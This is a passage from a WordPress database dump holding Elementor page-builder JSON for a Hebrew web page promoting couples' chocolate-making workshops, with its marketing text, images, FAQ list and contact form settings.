Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.526},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"03908aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><b>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/b><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.\\u00a0<\\/p><h2>\\u05de\\u05d4 \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd?<\\/h2><ul><li>\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d5\\u05ea<\\/li><li>\\u05d2\\u05e0\\u05d0\\u05e9 \\u05de\\u05d3\\u05d4\\u05d9\\u05dd<\\/li><li>\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05e0\\u05e9\\u05d9\\u05e7\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea<\\/li><li>\\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d8\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d3\\u05e2\\u05d5\\u05ea<\\/li><\\/ul><p>\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05da \\u05d5\\u05e8\\u05e7 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d1\\u05ea\\u05e2\\u05e9\\u05d9\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05d8\\u05e2\\u05dd. \\u05e1\\u05de\\u05db\\u05d5 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e0\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"106e6d0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>\\u05de\\u05d4 \\u05e2\\u05d5\\u05d3 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e2\\u05d5\\u05e9\\u05d9\\u05dd?<\\/h3><ul><li><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea<\\/a><u><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd<\\/a><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd<\\/a><\\/u><\\/li><\\/ul><div>\\u00a0<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b295518\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d1\\u05d0\\u05d4\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"lg\",\"icon\":\"fa fa-sign-in\",\"icon_indent\":{\"unit\":\"px\",\"size\":10},\"background_color\":\"#692910\",\"button_box_shadow_box_shadow_type\":\"yes\",\"selected_icon\":{\"value\":\"fas fa-sign-in-alt\",\"library\":\"fa-solid\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.474},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"]},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7304a39f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7c05bf41\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d6394c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7554346f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d4\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05d4\\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea, \\u05e2\\u05dc\\u05d9\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05e7\\u05d7\\u05ea \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05d5\\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8, \\u05ea\\u05dc\\u05d5\\u05d9 \\u05d1\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8 \\u05d5\\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05e0\\u05e9\\u05d0\\u05d9\\u05e8 \\u05dc\\u05db\\u05dd \\u05db\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8, \\u05d6\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05dc\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05d0\\u05ea\\u05dd \\u05de\\u05d7\\u05dc\\u05d9\\u05d8\\u05d9\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05d1\\u05d1\\u05d5\\u05e7\\u05e8 \\u05d0\\u05d5 \\u05d1\\u05e2\\u05e8\\u05d1, \\u05dc\\u05d0 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"5ff16944\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3470d199\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1741,356,'_elementor_version','2.7.5'),(1742,356,'_elementor_template_type','wp-post'),(1743,356,'_elementor_pro_version','2.7.3'),(1747,357,'_wp_page_template','elementor_header_footer'),(1748,357,'_elementor_edit_mode','builder'),(1749,357,'_elementor_data','[{\"id\":\"19fc9855\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6ce1bfb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23397fa3\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.526},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"03908aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><b>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/b><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><\\/p>\\n<p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.&nbsp;<\\/p>\\n<h2>\\u05de\\u05d4 \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd?<\\/h2>\\n<ul>\\n<li>\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d5\\u05ea<\\/li>\\n<li>\\u05d2\\u05e0\\u05d0\\u05e9 \\u05de\\u05d3\\u05d4\\u05d9\\u05dd<\\/li>\\n<li>\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05e0\\u05e9\\u05d9\\u05e7\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea<\\/li>\\n<li>\\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d8\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d3\\u05e2\\u05d5\\u05ea<\\/li>\\n<\\/ul>\\n<p>\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05da \\u05d5\\u05e8\\u05e7 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d1\\u05ea\\u05e2\\u05e9\\u05d9\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 